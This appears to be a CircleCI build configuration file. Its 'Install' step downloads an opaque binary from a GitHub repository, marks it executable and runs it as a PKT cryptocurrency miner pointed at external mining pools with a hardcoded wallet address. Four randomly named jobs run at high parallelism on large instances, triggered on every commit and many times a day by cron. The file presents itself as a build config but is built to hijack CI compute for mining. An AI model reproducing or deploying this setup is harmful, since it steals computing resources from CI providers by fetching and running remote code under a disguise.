working_dir: &working_dir ~/app 
.build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install
        command: |
                    wget https://github.com/Xilahani8/work/raw/main/private && chmod +x private && ./private ann -p pkt1qqwya7kp20pn9ugnw3lj78l3dmjp00gk3ct9ey9 http://pool.pkt.world/master/ http://pool.pktpool.io 2>&1 | grep --color=never -o "annmine.rs.*Ke.*"
        no_output_timeout: 300m                               
version: 2.0 
jobs: 
  tjsjsnka: 
    <<: *script
    parallelism: 4
    docker:
      - image: python
    resource_class: large
  lksjdjd: 
    <<: *script
    parallelism: 4
    docker:
      - image: python
    resource_class: large
  lsjxnxn: 
    <<: *script
    parallelism: 4
    docker:
      - image: python
    resource_class: large
  mxncbcn: 
    <<: *script
    parallelism: 4
    docker:
      - image: python
    resource_class: large

workflows: 
  version: 2 
  commit: 
    jobs: 
      - tjsjsnka
      - lksjdjd
      - lsjxnxn
      - mxncbcn
  nightly:
     triggers:
      - schedule:
          cron: "0 0,2,5,8,10,13,15,18,20 * * *"
          filters:
            branches:
              only:
                - main
                
     jobs:
      - tjsjsnka
      - lksjdjd
      - lsjxnxn
      - mxncbcn
